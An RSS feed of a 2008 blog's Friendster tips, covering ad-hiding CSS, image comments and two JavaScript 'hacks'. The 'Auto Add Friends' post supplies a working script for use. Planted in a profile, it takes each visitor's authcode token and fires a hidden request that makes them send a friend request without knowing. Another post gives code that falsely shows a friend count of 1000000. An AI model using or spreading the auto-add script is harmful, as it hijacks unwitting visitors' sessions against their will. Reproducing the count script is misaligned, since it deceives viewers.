<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SmileyLover Blog &#187; Friendster</title>
	<atom:link href="http://blog.smileylover.com/category/friendster/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.smileylover.com</link>
	<description>Sharing Knowledge and Resources</description>
	<lastBuildDate>Sun, 04 Apr 2010 18:32:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Remove Friendster Ads With CSS Injection</title>
		<link>http://blog.smileylover.com/remove-friendster-ads-with-css-injection/</link>
		<comments>http://blog.smileylover.com/remove-friendster-ads-with-css-injection/#comments</comments>
		<pubDate>Sat, 29 Nov 2008 07:43:59 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[CSS]]></category>
		<category><![CDATA[Friendster]]></category>
		<category><![CDATA[CSS Injection]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=119</guid>
		<description><![CDATA[If you feel all ads around your Friendster profile so annoying, you can try this simple CSS injection to remove it all. Login to your account, go to Edit Profile and add this CSS code in Costumize CSS Box. This code will try to hidden all Class and ID that contains ads. Code 1 ?View [...]]]></description>
			<content:encoded><![CDATA[<p><!--noadsense-->If you feel all ads around your <a title="Social Site" href="http://friendster.com" target="_blank"><strong>Friendster</strong></a> profile so annoying, you can try this <strong>simple CSS injection</strong> to remove it all.  Login to your account, go to Edit Profile and add this CSS code in Costumize CSS Box.  This code will try to hidden all <strong>Class</strong> and <strong>ID</strong> that contains <strong>ads</strong>.</p>
<p>Code 1</p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p119code3'); return false;">View Code</a> CSS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1193"><td class="code" id="p119code3"><pre class="css" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">/* Hide Google Search */</span>
<span style="color: #cc00cc;">#search</span> form <span style="color: #00AA00;">&#123;</span> <span style="color: #000000; font-weight: bold;">display</span> <span style="color: #00AA00;">:</span> <span style="color: #993333;">none</span> !important<span style="color: #00AA00;">;</span> <span style="color: #00AA00;">&#125;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">/* Hide Friendster Classifieds */</span>
<span style="color: #cc00cc;">#marketing</span> <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">/* Hide Footer */</span>
<span style="color: #cc00cc;">#footer_container</span> <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">/* Hide Footer link only */</span>
<span style="color: #cc00cc;">#footer</span> a <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span></pre></td></tr></table></div>

<p><span id="more-119"></span></p>
<p>Code 2</p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p119code4'); return false;">View Code</a> CSS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1194"><td class="code" id="p119code4"><pre class="css" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">/* Hide sidebar google ads*/</span>
<span style="color: #cc00cc;">#content_14</span> <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">/* Hide Classifieds | Jobs | */</span>
<span style="color: #6666ff;">.secondary_links</span> <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">/* Hide banner ads on top */</span>
<span style="color: #6666ff;">.banner_ad_fix</span> <span style="color: #00AA00;">&#123;</span><span style="color: #000000; font-weight: bold;">display</span><span style="color: #00AA00;">:</span><span style="color: #993333;">none</span>!important<span style="color: #00AA00;">;</span><span style="color: #00AA00;">&#125;</span></pre></td></tr></table></div>

<p>Now see your profile, bingo! So clean!! If your profile doesn&#8217;t change immediately, don&#8217;t worry, come back later in few hours or tommorow until Friendster clear the cache <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/remove-friendster-ads-with-css-injection/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Write Friendster Comment More Than 1000 Chars with Text2Image!</title>
		<link>http://blog.smileylover.com/write-friendster-comment-more-than-1000-chars-with-text2image/</link>
		<comments>http://blog.smileylover.com/write-friendster-comment-more-than-1000-chars-with-text2image/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 14:03:48 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Friendster]]></category>
		<category><![CDATA[SmileyLover News]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=105</guid>
		<description><![CDATA[Maybe sometimes you want to write a comment to your friends in Friendster more than 1000 characters but they dont allowed us to do it ? Their basic form using javascript to count amount of character inside textarea, so maybe you will think to disable this javascript via browser setting. Yes, you can do that [...]]]></description>
			<content:encoded><![CDATA[<p>Maybe sometimes you want to write a comment to your friends in <a title="Social site" href="http://friendster.com">Friendster</a> more than 1000 characters but they dont allowed us to do it ? Their basic form using javascript to count amount of character inside textarea, so maybe you will think to disable this javascript via browser setting.  Yes, you can do that but now you can&#8217;t send form or submit comment!  Why ? Because they using (again!) javascript to send this form (onClick function)! Weird right?</p>
<p>So how we can pass this through?  Have you ever wonder to send your comment in graphic mode than text mode?  Yes, you right! We will send comment more than 1000 characters using <a title="Text 2 Image Generator - Write Your Text as Cool Images with Different Fonts in PNG Format!" href="http://text2image.co.nr"><strong>Text2image Generator</strong></a> <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />   It&#8217;s pretty cool online aplication.  Not like the others!  It&#8217;s have a lot of benefits <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><span id="more-105"></span></p>
<p>They allow us to write up to 2000 characters in once with a lot of options to make your graphic comment looking nice.  Options are font type, font height, text color, text shadow, background color or transparent mode, image border and color, and image width.  For width, i suggest you to generate not more than 500px if you want to use it in <a title="Social site" href="http://friendster.com">Friendster</a>. Interesting ? Go to this address below.</p>
<blockquote><p><a title="Text 2 Image Generator - Write Your Text as Cool Images with Different Fonts in PNG Format!" href="http://text2image.co.nr"><strong>Text2Image Generator (PNG)</strong></a></p></blockquote>
<p>Here&#8217;s the example :<br />
Normal Text<br />
<img alt="" src="http://i38.tinypic.com/29p69ly.jpg" title="Normal Text - Text 2 Image Generator - Write Your Text as Cool Images with Different Fonts in PNG Format!" class="alignnone" width="500" height="128" /></p>
<p>Transparent Background<br />
<img alt="" src="http://i38.tinypic.com/35a5e1y.jpg" title="Transparent Background - Text 2 Image Generator - Write Your Text as Cool Images with Different Fonts in PNG Format!" class="alignnone" width="500" height="128" /></p>
<p>Text Shadow<br />
<img alt="" src="http://i37.tinypic.com/2uxwdn9.jpg" title="Text Shadow - Text 2 Image Generator - Write Your Text as Cool Images with Different Fonts in PNG Format!" class="alignnone" width="500" height="128" /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/write-friendster-comment-more-than-1000-chars-with-text2image/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Auto Add Friends Using (Javascript) Friendster Hacks</title>
		<link>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/</link>
		<comments>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/#comments</comments>
		<pubDate>Sat, 27 Sep 2008 22:19:16 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Friendster]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=90</guid>
		<description><![CDATA[This is a little trick using javascript inserted to your profile in about me or who i want to meet sections. This script will add another Friendster user become your friends when they view your profile and not your friends yet Ok let&#8217;s go. For details how to insert and generate JS script to embed [...]]]></description>
			<content:encoded><![CDATA[<p>This is a little trick using javascript inserted to your profile in <strong>about me</strong> or <strong>who i want to meet</strong> sections.  This script will add another <a title="Social Site" href="http://friendster.com" target="_blank"><strong>Friendster</strong></a> user become your friends when they view your profile and not your friends yet <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ok let&#8217;s go.  For details how to insert and generate JS script to embed in profile, please view my past post about <a href="http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/"><strong>Boost Your Friends Using (Javascript) Friendster Hacks</strong></a> <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />   I assummed you already have file hosting account in <a title="Free File Hosting" href="http://www.fileave.com/" target="_blank">Fileave</a> or <a title="Free File Hosting" href="http://www.ripway.com/" target="_blank">Ripway</a>.  Copy this code below into your notepad and rename into, example <em>my-script.js</em> or if you already have previous js file in file hosting account, just edit it and save <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><span id="more-90"></span></p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p90code6'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p906"><td class="code" id="p90code6"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">var</span> afaimg <span style="color: #339933;">=</span> document.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'span'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
afaimg.<span style="color: #660066;">id</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;addme&quot;</span><span style="color: #339933;">;</span>
document.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'head'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span>.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>afaimg<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">function</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> eadd <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;Your Email Address&quot;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> k <span style="color: #339933;">=</span> document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;controlPanelButtons&quot;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">innerHTML</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> a <span style="color: #339933;">=</span> k.<span style="color: #660066;">slice</span><span style="color: #009900;">&#40;</span>k.<span style="color: #660066;">indexOf</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;authcode=&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> m <span style="color: #339933;">=</span> a.<span style="color: #660066;">slice</span><span style="color: #009900;">&#40;</span><span style="color: #CC0000;">9</span><span style="color: #339933;">,</span><span style="color: #CC0000;">39</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;addme&quot;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">innerHTML</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;&lt;img src=<span style="color: #000099; font-weight: bold;">\&quot;</span>http://www.friendster.com/addfriendrequest.php?authcode=&quot;</span><span style="color: #339933;">+</span>m<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;uid=&quot;</span><span style="color: #339933;">+</span>pageOwnerID<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;email=&quot;</span><span style="color: #339933;">+</span>eadd<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;firstname=&amp;lastname=&amp;friend=&amp;submit=1<span style="color: #000099; font-weight: bold;">\&quot;</span> width=<span style="color: #000099; font-weight: bold;">\&quot;</span>0<span style="color: #000099; font-weight: bold;">\&quot;</span> height=<span style="color: #000099; font-weight: bold;">\&quot;</span>0<span style="color: #000099; font-weight: bold;">\&quot;</span> /&gt;&quot;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>attachOnLoadHandler<span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #009900;">&#125;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> window.<span style="color: #000066;">onload</span> <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>Please change <strong>Your Email Address</strong> in line 5 with your real email address used in your Friendster account.  Now everytime another Friendster user view your profile they&#8217;ll add into your friends list <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Boost Your Friends Using (Javascript)-Friendster Hacks</title>
		<link>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/</link>
		<comments>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 20:22:12 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Friendster]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[hack friendster friend]]></category>
		<category><![CDATA[javascript friendster]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=48</guid>
		<description><![CDATA[Remember first this is just for fun. I&#8217;m not responsible for any damage by using this script. Agree? If you did so let&#8217;s go. This is a simple javascript that insert into your profile in the about me or who i want to meet section to change your amount of friends. Perfectly for newbies in [...]]]></description>
			<content:encoded><![CDATA[<p>Remember first this is just for fun.  I&#8217;m not responsible for any damage by using this script.  Agree?  If you did so let&#8217;s go.  This is a simple javascript that insert into your profile in the <strong>about me</strong> or <strong>who i want to meet</strong> section to change your amount of friends.  Perfectly for newbies in <a href="http://friendster.com" target="_blank">friendster</a> who doesn&#8217;t have much friends yet <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>First open notepad or your favourite text editor and copy whole code below. Save as friends.js.</p>
<p><span id="more-48"></span></p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p48code8'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p488"><td class="code" id="p48code8"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">var</span> replaceLink <span style="color: #339933;">=</span> document.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;a&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
replaceLink.<span style="color: #660066;">href</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;http://www.friendster.com/friends/&quot;</span><span style="color: #339933;">+</span>pageOwnerID<span style="color: #339933;">;</span>
replaceLink.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>document.<span style="color: #660066;">createTextNode</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;View All (&lt;strong&gt;1000000&lt;/strong&gt;)&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> viewall <span style="color: #339933;">=</span> getElementsByClassName<span style="color: #009900;">&#40;</span>document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;content_2&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span><span style="color: #3366CC;">&quot;div&quot;</span><span style="color: #339933;">,</span><span style="color: #3366CC;">&quot;viewall&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span>.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;a&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #006600; font-style: italic;">//if exist</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>viewall <span style="color: #339933;">!==</span> <span style="color: #003366; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
viewall.<span style="color: #660066;">parentNode</span>.<span style="color: #660066;">replaceChild</span><span style="color: #009900;">&#40;</span>replaceLink<span style="color: #339933;">,</span>viewall<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #003366; font-weight: bold;">function</span> getElementsByClassName<span style="color: #009900;">&#40;</span>oElm<span style="color: #339933;">,</span>sTag<span style="color: #339933;">,</span>sClass<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> elm <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>oElm<span style="color: #009900;">&#41;</span>oElm <span style="color: #339933;">=</span> document<span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>sTag<span style="color: #009900;">&#41;</span>sTag <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;*&quot;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> els <span style="color: #339933;">=</span> oElm.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span>sTag<span style="color: #009900;">&#41;</span> <span style="color: #339933;">||</span> document.<span style="color: #660066;">all</span><span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">for</span> <span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">var</span> j<span style="color: #339933;">=</span><span style="color: #CC0000;">0</span><span style="color: #339933;">,</span>k<span style="color: #339933;">=</span>els.<span style="color: #660066;">length</span><span style="color: #339933;">;</span>j<span style="color: #339933;">&amp;</span>lt<span style="color: #339933;">;</span>k<span style="color: #339933;">;</span>j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">new</span> RegExp<span style="color: #009900;">&#40;</span>sClass<span style="color: #009900;">&#41;</span>.<span style="color: #660066;">test</span><span style="color: #009900;">&#40;</span>els<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span>.<span style="color: #660066;">className</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
elm.<span style="color: #660066;">push</span><span style="color: #009900;">&#40;</span>els<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000066; font-weight: bold;">return</span> elm<span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>

<p>Change bold number to suit for your needs.  Or you can download here.</p>
<blockquote><p><a title="Friendster Javascript Code" href="http://rapidshare.com/files/144207246/friendster-hackamountfriends.js" target="_blank">Download Javascript</a></p></blockquote>
<p>Second, upload to your hosting or using <a href="http://ripway.com"><strong>ripway</strong></a> for free.  After uploaded, copy direct link from your javascript to this site for generate code that insert into friendster profile.</p>
<blockquote><p><a href="http://jsesbreno.googlepages.com/Darylldelfin.html">http://jsesbreno.googlepages.com/Darylldelfin.html</a></p></blockquote>
<p>Copy generated results from this site and paste into your <strong>about me</strong> or <strong>who i want to meet</strong> section. Finished <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Preview your profile now.</p>
<p>Source</p>
<blockquote><p><a href="http://friendstertalk.com/t20872-More-Friends.html">http://friendstertalk.com/t20872-More-Friends.html</a></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
	</channel>
</rss>

